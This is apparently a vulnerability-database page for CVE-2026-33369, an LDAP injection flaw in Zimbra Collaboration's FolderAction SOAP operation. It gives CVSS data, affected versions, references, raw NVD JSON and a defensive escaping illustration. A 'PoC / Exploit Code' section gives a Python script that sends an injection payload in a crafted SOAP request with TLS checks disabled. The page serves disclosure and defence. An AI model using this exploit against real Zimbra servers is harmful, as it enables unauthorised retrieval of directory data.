Security Vulnerability Report
CVE-2026-33369 CVSS 4.3 MEDIUM

Published: 2026-03-20 14:16:16
Last Modified: 2026-04-01 15:37:00

Description

Zimbra Collaboration (ZCS) 10.0 and 10.1 contains an LDAP injection vulnerability in the Mailbox SOAP service within a FolderAction operation. The application fails to properly sanitize user-supplied input before incorporating it into an LDAP search filter. An authenticated attacker can exploit this issue by sending a crafted SOAP request that manipulates the LDAP query, allowing retrieval of sensitive directory attributes.
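To make the defect concrete, the following added illustration (not Zimbra's code) places the FolderAction id from the PoC below into an LDAP filter first unescaped and then escaped per RFC 4515, and checks whether the result is still a single assertion. The filter shape `(folderId=...)` and the attribute name are assumptions for the demo.

```python
# Added illustration: unescaped vs. RFC 4515-escaped use of the FolderAction id
# in an LDAP filter. The filter shape and the attribute name "folderId" are
# assumptions for the demo, not Zimbra's actual query.

# RFC 4515 section 3: characters with special meaning in an assertion value.
_LDAP_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}


def escape_ldap_filter_value(value: str) -> str:
    """Escape a string so it can only ever be a literal assertion value."""
    out = []
    for ch in value:
        if ch in _LDAP_ESCAPES:
            out.append(_LDAP_ESCAPES[ch])
        elif ord(ch) > 0x7F:
            # Non-ASCII is emitted as escaped UTF-8 bytes, as RFC 4515 requires.
            out.append("".join(f"\\{b:02x}" for b in ch.encode("utf-8")))
        else:
            out.append(ch)
    return "".join(out)


def build_filter(folder_id: str, escape: bool) -> str:
    """Vulnerable pattern (escape=False) next to the hardened one (escape=True)."""
    value = escape_ldap_filter_value(folder_id) if escape else folder_id
    return f"(folderId={value})"


def is_single_assertion(ldap_filter: str) -> bool:
    """Structural check: exactly one '(attr=value)' item and no nested parens.

    An unescaped '(' or ')' inside the value means caller-supplied data has
    become filter syntax, which is the defect this CVE describes.
    """
    if not (ldap_filter.startswith("(") and ldap_filter.endswith(")")):
        return False
    inner = ldap_filter[1:-1]
    return "(" not in inner and ")" not in inner and "=" in inner


if __name__ == "__main__":
    # The payload from the PoC on this page.
    payload = "*)(uid=*))(|(uid=*"
    for escape in (False, True):
        f = build_filter(payload, escape)
        print(f"escape={escape}: {f}  single assertion? {is_single_assertion(f)}")
```

The same escaping is available as `ldap3.utils.conv.escape_filter_chars` if the ldap3 library is already in use; the point is that it must be applied to every value before concatenation, not added to a blocklist after the fact.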

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:* - VULNERABLE
Zimbra Collaboration (ZCS) 10.0
Zimbra Collaboration (ZCS) 10.1
NVD match range: versions from 10.0.0 up to, but excluding, 10.1.16 (the 10.1.16 release notes are listed under Security Fixes in the references).

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Target configuration
target_url = "https://example.com/service/soap"
auth_token = "VALID_AUTH_TOKEN_HERE"  # Obtained after login

# LDAP injection payload to manipulate the filter
# Example: trying to extract attributes or bypass logic
injection_payload = "*)(uid=*))(|(uid=*"

# Constructing the malicious SOAP request
soap_headers = {
    "Content-Type": "application/soap+xml",
    "Cookie": f"ZM_AUTH_TOKEN={auth_token}",
}

soap_body = f"""<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope">
  <soap:Header>
    <context xmlns="urn:zimbra">
      <authToken>{auth_token}</authToken>
    </context>
  </soap:Header>
  <soap:Body>
    <FolderActionRequest xmlns="urn:zimbraMail">
      <action op="rename" id="{injection_payload}" l="InjectedFolder"/>
    </FolderActionRequest>
  </soap:Body>
</soap:Envelope>"""

try:
    # verify=False disables TLS certificate validation for the request
    response = requests.post(target_url, headers=soap_headers, data=soap_body, verify=False)
    print(f"Status Code: {response.status_code}")
    print("Response:")
    print(response.text)
except Exception as e:
    print(f"Error: {e}")
```

References

https://wiki.zimbra.com/wiki/Security_Center (Vendor Advisory, Release Notes)
https://wiki.zimbra.com/wiki/Zimbra_Releases/10.1.16#Security_Fixes (Release Notes)
https://wiki.zimbra.com/wiki/Zimbra_Responsible_Disclosure_Policy (Product)
https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33369", "sourceIdentifier": "[email protected]", "published": "2026-03-20T14:16:16.017", "lastModified": "2026-04-01T15:36:59.913", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Zimbra Collaboration (ZCS) 10.0 and 10.1 contains an LDAP injection vulnerability in the Mailbox SOAP service within a FolderAction operation. The application fails to properly sanitize user-supplied input before incorporating it into an LDAP search filter. An authenticated attacker can exploit this issue by sending a crafted SOAP request that manipulates the LDAP query, allowing retrieval of sensitive directory attributes."}, {"lang": "es", "value": "Zimbra Collaboration (ZCS) 10.0 y 10.1 contiene una vulnerabilidad de inyección LDAP en el servicio SOAP de Mailbox dentro de una operación FolderAction. La aplicación no logra sanear adecuadamente la entrada proporcionada por el usuario antes de incorporarla a un filtro de búsqueda LDAP. Un atacante autenticado puede explotar este problema enviando una solicitud SOAP manipulada que manipula la consulta LDAP, permitiendo la recuperación de atributos de directorio sensibles."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": 
"cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.0.0", "versionEndExcluding": "10.1.16", "matchCriteriaId": "E8DBE536-EAB0-48FF-A195-C0DB0A7FBCA0"}]}]}], "references": [{"url": "https://wiki.zimbra.com/wiki/Security_Center", "source": "[email protected]", "tags": ["Vendor Advisory", "Release Notes"]}, {"url": "https://wiki.zimbra.com/wiki/Zimbra_Releases/10.1.16#Security_Fixes", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://wiki.zimbra.com/wiki/Zimbra_Responsible_Disclosure_Policy", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}